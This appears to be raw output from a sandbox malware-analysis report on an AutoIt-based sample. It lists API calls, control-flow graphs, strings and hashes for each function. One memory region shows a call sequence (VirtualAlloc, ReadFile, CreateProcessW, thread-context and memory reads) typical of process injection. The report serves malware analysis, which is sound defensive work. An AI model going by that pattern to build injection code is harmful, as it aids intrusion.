                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                          • KillTimer.USER32(?,00000001,?), ref: 004011B9
                          • PostQuitMessage.USER32(00000000), ref: 004011CB
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                          • CreatePopupMenu.USER32 ref: 00401204
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                          • String ID: TaskbarCreated
                          • API String ID: 129472671-2362178303
                          • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                          • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                          • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                          • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                          APIs
                          • _malloc.LIBCMT ref: 004115F1
                            • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                            • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                            • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                          • std::exception::exception.LIBCMT ref: 00411626
                          • std::exception::exception.LIBCMT ref: 00411640
                          • __CxxThrowException@8.LIBCMT ref: 00411651
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                          • String ID: ,*H$4*H$@fI
                          • API String ID: 615853336-1459471987
                          • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                          • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                          • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                          • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2065 3f51b40-3f51bee call 3f4f530 2068 3f51bf5-3f51c1b call 3f52a50 CreateFileW 2065->2068 2071 3f51c22-3f51c32 2068->2071 2072 3f51c1d 2068->2072 2080 3f51c34 2071->2080 2081 3f51c39-3f51c53 VirtualAlloc 2071->2081 2073 3f51d6d-3f51d71 2072->2073 2074 3f51db3-3f51db6 2073->2074 2075 3f51d73-3f51d77 2073->2075 2077 3f51db9-3f51dc0 2074->2077 2078 3f51d83-3f51d87 2075->2078 2079 3f51d79-3f51d7c 2075->2079 2084 3f51e15-3f51e2a 2077->2084 2085 3f51dc2-3f51dcd 2077->2085 2086 3f51d97-3f51d9b 2078->2086 2087 3f51d89-3f51d93 2078->2087 2079->2078 2080->2073 2082 3f51c55 2081->2082 2083 3f51c5a-3f51c71 ReadFile 2081->2083 2082->2073 2088 3f51c73 2083->2088 2089 3f51c78-3f51cb8 VirtualAlloc 2083->2089 2092 3f51e2c-3f51e37 VirtualFree 2084->2092 2093 3f51e3a-3f51e42 2084->2093 2090 3f51dd1-3f51ddd 2085->2090 2091 3f51dcf 2085->2091 2094 3f51d9d-3f51da7 2086->2094 2095 3f51dab 2086->2095 2087->2086 2088->2073 2096 3f51cbf-3f51cda call 3f52ca0 2089->2096 2097 3f51cba 2089->2097 2098 3f51df1-3f51dfd 2090->2098 2099 3f51ddf-3f51def 2090->2099 2091->2084 2092->2093 2094->2095 2095->2074 2105 3f51ce5-3f51cef 2096->2105 2097->2073 2102 3f51dff-3f51e08 2098->2102 2103 3f51e0a-3f51e10 2098->2103 2101 3f51e13 2099->2101 2101->2077 2102->2101 2103->2101 2106 3f51cf1-3f51d20 call 3f52ca0 2105->2106 2107 3f51d22-3f51d36 call 3f52ab0 2105->2107 2106->2105 2112 3f51d38 2107->2112 2113 3f51d3a-3f51d3e 2107->2113 2112->2073 2115 3f51d40-3f51d44 CloseHandle 2113->2115 2116 3f51d4a-3f51d4e 2113->2116 2115->2116 2117 3f51d50-3f51d5b VirtualFree 2116->2117 2118 3f51d5e-3f51d67 2116->2118 2117->2118 2118->2068 2118->2073
                          APIs
                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03F51C11
                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03F51E37
                          Memory Dump Source
                          • Source File: 00000000.00000002.2150454290.0000000003F4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F4F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3f4f000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CreateFileFreeVirtual
                          • String ID:
                          • API String ID: 204039940-0
                          • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                          • Instruction ID: 030004b42aa96fa634323a58aab883696411beda2c6fe51b9917dbc8a07fd4dc
                          • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                          • Instruction Fuzzy Hash: ABA10975E00209EBDF14CFA4C899BEEB7B5BF48304F148559E605BB280D775AA41CF94

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2119 401250-40125c 2120 401262-401293 call 412f40 call 401b80 2119->2120 2121 4012e8-4012ed 2119->2121 2126 4012d1-4012e2 KillTimer SetTimer 2120->2126 2127 401295-4012b5 2120->2127 2126->2121 2128 4012bb-4012bf 2127->2128 2129 4272ec-4272f2 2127->2129 2132 4012c5-4012cb 2128->2132 2133 42733f-427346 2128->2133 2130 4272f4-427315 Shell_NotifyIconW 2129->2130 2131 42731a-42733a Shell_NotifyIconW 2129->2131 2130->2126 2131->2126 2132->2126 2136 427393-4273b4 Shell_NotifyIconW 2132->2136 2134 427348-427369 Shell_NotifyIconW 2133->2134 2135 42736e-42738e Shell_NotifyIconW 2133->2135 2134->2126 2135->2126 2136->2126
                          APIs
                            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                          • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                          • String ID:
                          • API String ID: 3300667738-0
                          • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                          • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2137 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2140 427190-4271ae RegQueryValueExW 2137->2140 2141 40e4eb-40e4f0 2137->2141 2142 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2140->2142 2143 42721a-42722a RegCloseKey 2140->2143 2148 427210-427219 call 436508 2142->2148 2149 4271f7-42720e call 402160 2142->2149 2148->2143 2149->2148
                          APIs
                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                          • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: QueryValue$CloseOpen
                          • String ID: Include$Software\AutoIt v3\AutoIt
                          • API String ID: 1586453840-614718249
                          • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                          • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                          • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                          • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2154 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                          • ShowWindow.USER32(?,00000000), ref: 004105E4
                          • ShowWindow.USER32(?,00000000), ref: 004105EE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                          • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                          • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                          • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                          APIs
                            • Part of subcall function 03F517D0: Sleep.KERNELBASE(000001F4), ref: 03F517E1
                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03F51A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2150454290.0000000003F4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F4F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3f4f000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: CreateFileSleep
                          • String ID: GBMA8S1FU75GA782QXXF
                          • API String ID: 2694422964-2434113072
                          • Opcode ID: 7b31208ba4edc2a86d3d26e1c112eb72fee83ba54330f25d22a6a9800ba876b2
                          • Instruction ID: 5616d57a5d58f68283fcf09f9af889f1fdad08818196a1bb0916e39d670d8ad4
                          • Opcode Fuzzy Hash: 7b31208ba4edc2a86d3d26e1c112eb72fee83ba54330f25d22a6a9800ba876b2
                          • Instruction Fuzzy Hash: 3861A475D14248DBEF11DBB4C844BDEBB79AF59300F004199E608BB2C1D7BA1B45CB65
                          APIs
                          • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                          • _wcsncpy.LIBCMT ref: 00401C41
                          • _wcscpy.LIBCMT ref: 00401C5D
                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                          • String ID: Line:
                          • API String ID: 1874344091-1585850449
                          • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                          • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                          • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                          • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                          APIs
                          • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                          • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                          • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                          • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Close$OpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 1607946009-824357125
                          • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                          • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                          • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                          • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                          APIs
                          • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                          • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                          • _wcsncpy.LIBCMT ref: 004102ED
                          • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                          • _wcsncpy.LIBCMT ref: 00410340
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                          • String ID:
                          • API String ID: 3170942423-0
                          • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                          • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                          • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                          • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID:
                          • String ID: #v
                          • API String ID: 0-554117064
                          • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                          • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                          • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                          • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                          • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Process$CurrentTerminate
                          • String ID: #v
                          • API String ID: 2429186680-554117064
                          • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                          • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                          • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                          • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 03F50F8B
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F51021
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F51043
                          Memory Dump Source
                          • Source File: 00000000.00000002.2150454290.0000000003F4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F4F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3f4f000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                          • Instruction ID: 66fb9a0a7bce4d8370f8d5a92ee9e1f5c112966509c2420094ae38507fb669ae
                          • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                          • Instruction Fuzzy Hash: 93620C34A14258DBEB24CFA4C850BDEB376EF58300F1091A9E60DEB394E7759E81CB59
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2148923662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149052637.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149100869.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149118327.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149145402.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2149198071.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_lPX6PixV4t.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID: Error:
                          • API String ID: 4104443479-232661952
                          • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                          • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                          • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                          • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                          APIs
                          • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                            • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                            • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                            • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                            • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                            • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2148982265.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
